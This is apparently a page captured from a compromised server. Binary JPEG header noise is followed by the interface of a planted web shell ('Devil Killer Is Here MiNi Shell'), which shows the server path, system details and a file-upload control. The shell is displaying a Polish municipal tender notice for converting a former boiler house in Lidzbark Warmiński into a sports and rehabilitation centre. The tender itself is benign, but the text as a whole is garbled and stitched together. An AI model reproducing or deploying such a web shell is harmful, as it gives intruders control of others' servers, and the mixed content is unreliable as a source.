JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230306/0012262101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa budynku po byłej kotłowni oraz terenu przylegającego na potrzeby centrum rehabilitacji i aktywności sportowej przy ul. Leśnej w Lidzbarku Warmińskim” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Lidzbark Warmiński</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743500</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleksandra Świętochowskiego 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lidzbark Warmiński</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">897678500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@lidzbarkw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.lidzbarkw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa budynku po byłej kotłowni oraz terenu przylegającego na potrzeby centrum rehabilitacji i aktywności sportowej przy ul. Leśnej w Lidzbarku Warmińskim” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-02e4e064-bbfc-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00122621</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00004955/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa budynku po byłej kotłowni oraz terenu przylegającego na potrzeby centrum rehabilitacji i aktywności sportowej przy ul. Leśnej w Lidzbarku Warmińskim.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lidzbarkw <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji<br/>elektronicznej.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ pod<br/>adresem:<br/>https://platformazakupowa.pl/pn/lidzbarkw<br/>W postępowaniu o udzielenie zamówienia komunikacja miedzy Zamawiającym a Wykonawcami odbywa się za pośrednictwem<br/>Platformy pod adresem: https://platformazakupowa.pl/pn/lidzbark<br/>Korzystanie z platformy zakupowej jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Osobą uprawnioną do kontaktu z<br/>Wykonawcami jest: Sylwia Welc i Kamil Mazurowski.<br/>2. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ pod<br/>adresem:<br/>https://platformazakupowa.pl/pn/lidzbarkw . Korzystanie z platformy zakupowej jest bezpłatne.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/ i formularza „Wyślij wiadomość do zamawiającego”.<br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem https://platformazakupowa.pl/ poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi<br/>się komunikat, że wiadomość została wysłana do zamawiającego.<br/>3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem<br/>https://platformazakupowa.pl/. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia<br/>ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi<br/>przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformy<br/>zakupowej do konkretnego wykonawcy.<br/>4. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>https://platformazakupowa.pl/ przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie<br/>może trafić do folderu SPAM.<br/>5. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na https://platformazakupowa.pl/ , tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych -<br/>MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików<br/>.pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z https://platformazakupowa.pl/ określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiem https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem<br/>https://platformazakupowa.pl/strona/45-instrukcje .<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>https://platformazakupowa.pl/, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem...Ciąg dalszy w rozdziale XII SWZ . <br/>10. Ofertę i oświadczenia składa się pod rygorem nieważności w formie elektronicznej tzn. opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>11. Oferta powinna być sporządzona w języku polskim.... więcej w rozdziale XIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE<br/>L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim w Lidzbarku Warmińskim jest: Burmistrz<br/>Lidzbarka Warmińskiego z siedzibą pod ul. Aleksandra Świętochowskiego 14, 11-100 Lidzbark Warmiński, tel.: 89 767 85 00; e-mail:<br/>um@lidzbarkw.pl<br/>2) Zamawiający wyznaczył Inspektora Ochrony Danych Osobowych, którym jest Pani Dorota Ejsmont, kontakt: e-mail:<br/>d.ejsmont@lidzbarkw.pl, telefon: 89 767 85 39, z którą można kontaktować się we wszystkich sprawach dotyczących przetwarzania<br/>danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych osobowych;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji pn. „Przebudowa<br/>budynku po byłej kotłowni oraz terenu przylegającego na potrzeby centrum rehabilitacji i aktywności sportowej przy ul. Leśnej w<br/>Lidzbarku Warmińskim”, odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.<br/>3) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>4) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>5) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>6) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia); na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy<br/>w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>8) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.9.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane polegające na wykonaniu w systemie „zaprojektuj i wybuduj” prac<br/>budowlanych i instalacyjnych, poprzedzonych opracowaniem dokumentacji projektowej (Projektu budowlanego i Projektu<br/>wykonawczego), a także zapewnienie niezbędnego wyposażenia związanego z funkcją obiektu oraz dopuszczenie do<br/>użytkowania powstałego w wyniku przeprowadzenia inwestycji Centrum Rehabilitacji i Aktywności Sportowej. Zamierzenie<br/>zakłada przebudowę budynku po byłej kotłowni i adaptację na potrzeby centrum rehabilitacji i aktywności sportowej.<br/>Niniejszy obiekt ma zapewnić aktywność sportową dla sportów walki, strzelectwa pneumatycznego oraz<br/>wspinaczki.Zamierzenie inwestycyjne będzie polegało na utwardzeniu terenu w celu zapewnienia miejsc postojowych dla<br/>samochodów.<br/>Zagospodarowaniu górnych pomieszczeń na cele administracyjne. Wykorzystaniu oraz przystosowaniu pomieszczeń<br/>parterowych na potrzeby takich sportów jak: boks, zapasy, wspinaczka, strzelectwo pneumatyczne. Zamierzenie obejmuje<br/>również wybudowanie pomieszczeń sanitarnych zapewniających zadbanie o podstawowe potrzeby fizjologiczne oraz<br/>higieniczne oraz możliwość odświeżenia się po sportach wymagających dużego wysiłku fizycznego. Przebudowa byłej<br/>kotłowni przewiduje wykonanie prac z branży budowlanej, sanitarnej oraz elektrycznej aby zapewnić sprawne<br/>funkcjonowanie obiektu.<br/>Zakres zamówienia obejmuje wykonanie dokumentacji projektowej oraz zrealizowanie wszystkich prac w oparciu o<br/>wykonaną dokumentację projektową, pod nadzorem osób posiadających stosowne uprawnienia budowlane.<br/>Szczegółowy zakres zamówienia został określony w dokumentach zamówienia tj. w Programie Funkcjonalno - Użytkowym<br/>zwanym dalej (PFU) wraz z jego załącznikami, który stanowi załącznik nr 11 do SWZ, w Specyfikacji Warunków Zamówienia<br/>(SWZ) wraz ze wszystkimi jej załącznikami i wyjaśnieniami oraz w Projektowanych Postanowieniach Umowy (PPU), które<br/>stanowią załącznik nr 8 do SWZ.<br/>Zamówienie realizowane będzie przy udziale środków z Rządowego Funduszu Polski Ład: Program Inwestycji<br/>Strategicznych – „Edycja Czwarta – Polskie Uzdrowiska” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">71200000-0 - Usługi architektoniczne i podobne</p> <p class="mb-0">71500000-3 - Usługi związane z budownictwem</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">26 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagami:<br/>1) cena (C) – waga: 60%,<br/>2) okres gwarancji jakości i rękojmi za wady (G)– waga: 40%,<br/>Za najkorzystniejszą zostanie uznana oferta, która nie podlega odrzuceniu i uzyskała najwyższą ocenę, będącą sumą ocen C i G .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że :<br/>a) posiada środki finansowe lub zdolność kredytową na kwotę nie niższą niż<br/>3 000 000,00 złotych (słownie: trzy miliony złotych),<br/>b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>niniejszego zamówienia na kwotę nie niższą niż 4 000 000,00 złotych (słownie: cztery miliony złotych),<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże że:<br/>a) wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>co najmniej dwie roboty budowlane polegające na:<br/>budowie budynku użyteczności publicznej i/lub przebudowie budynku użyteczności publicznej i/lub rozbudowie 